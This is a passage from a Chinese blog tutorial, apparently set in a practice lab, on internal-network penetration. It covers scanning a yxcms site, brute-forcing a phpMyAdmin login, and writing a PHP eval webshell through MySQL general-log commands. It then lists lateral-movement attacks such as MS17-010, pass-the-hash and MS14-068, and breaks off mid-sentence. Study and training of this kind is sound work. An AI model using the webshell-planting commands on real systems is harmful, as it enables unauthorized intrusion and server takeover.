内网渗透实战技巧

本文详细介绍了内网渗透的步骤,从拿下Web服务器,利用phpmyadmin后台getshell,到后渗透过程,包括权限提升、账号密码获取、远程桌面登录等。接着探讨了内网主机信息收集和横向渗透技巧,涉及MS17-010、CVE-2019-0708等多个漏洞利用。文章还分享了内网存活主机的探测和服务扫描方法,以及攻陷内网的多种攻击策略。
摘要由CSDN通过智能技术生成

目录

拿下Web服务器

phpmyadmin后台getshell

后渗透第一步

派生CobaltStrike权限

获得System权限

获取账号密码

远程桌面登录

添加路由、挂Socks4a代理

域信息收集

内网主机信息收集

内网存活主机探测

内网存活主机端口扫描

内网存活主机服务探测

内网横向渗透攻击技巧

MS17-010

CVE-2019-0708

psexec攻击

哈希传递攻击

MS14-068

 在这里还是要推荐下我自己建的Python学习Q群:705933274,群里都是学Python的,如果你想学或者正在学习Python ,欢迎你加入,大家都是软件开发党,不定期分享干货(只有Python软件开发相关的),包括我自己整理的一份2021最新的Python进阶资料和零基础教学,欢迎进阶中和对Python感兴趣的小伙伴加入!


拓扑图如下:

·  Web服务器(Windows7):192.168.10.14 、192.168.52.143 主机名:stu1

·  域成员主机(Windows Server 2003):192.168.52.141 主机名:root-tvi862ubeh

·  域控(Windows Server 2008):192.168.52.138 主机名:owa

其中,Web服务器的192.168.10.14模拟公网地址,我们可以直接访问192.168.10.14。但是我们访问不了192.168.52.0网段。

 

拿下Web服务器

本文主要是讲内网渗透方面,所以关于怎么拿下Web服务器,比较粗略的过。

说下我们对Web服务器的思路吧。在红蓝对抗中,拿到了入口站点,我们首先会想办法获取入口点的shell,再以此挂隧道通内网。而拿shell无非是上传木马、SQL注入、反序列化。而在很多网站的登录后台后,会存在文件上传漏洞,进而getshell。

访问Web服务器地址 http://192.168.10.14/yxcms/ ,是一个yxcms的站点。关于yxcms的漏洞,传送门:代码审计| yxcms app 1.4.6 漏洞集合

点击并拖拽以移动

对于yxcms我也不熟悉,之前没接触过。拿到目标第一先用御剑扫描下后台吧

发现phpmyadmin后台登录地址:http://192.168.10.14/phpmyadmin/

发现一个压缩包文件,该文件是网站的压缩包文件:http://192.168.10.14/beifen.rar

发现phpinfo文件:http://192.168.10.14/phpinfo.php

发现一些比较敏感的目录,这些目录都存在目录遍历漏洞

phpmyadmin后台getshell

对phpmyadmin后台进行爆破,得到账号密码:root/root

进入phpmyadmin后台后,获取shell。传送门:phpmyadmin爆破和后台getshell

这里由于 secure_file_priv的值为NULL,所以我们不能利用写into outfile写木马getshell。

这里我们利用日志文件Getshell。传送门:phpmyadmin利用日志文件Getshell

执行以下命令

set global general_log=on;                                     #开启日志
set global general_log_file='C:/phpstudy/www/yxcms/hack.php';  #设置指定文件为网站日志存放文件
SELECT '<?php eval($_POST["cmd"]);?>'               #执行该语句,会将该命令写入日志文件中点击并拖拽以移动

最后用菜刀连接,如下。

 

 

后渗透第一步

在拿到了Web服务器的权限后,我们就要尽可能多的搜集该服务器的信息,然后搭建隧道通往内网!

执行以下命令我们知道当前的用户身份是 administrator ,在管理员组中,并且处在域 god 中。该主机有两张网卡,分别是:192.168.10.14,192.168.52.143。由此可知,其实获得的这个权限就是域管理员权限。(搞不懂环境为啥要以域管理员账号登录,为啥不以本地普通用户登录??)

现在我们想反弹一个MSF的

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平静愉悦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值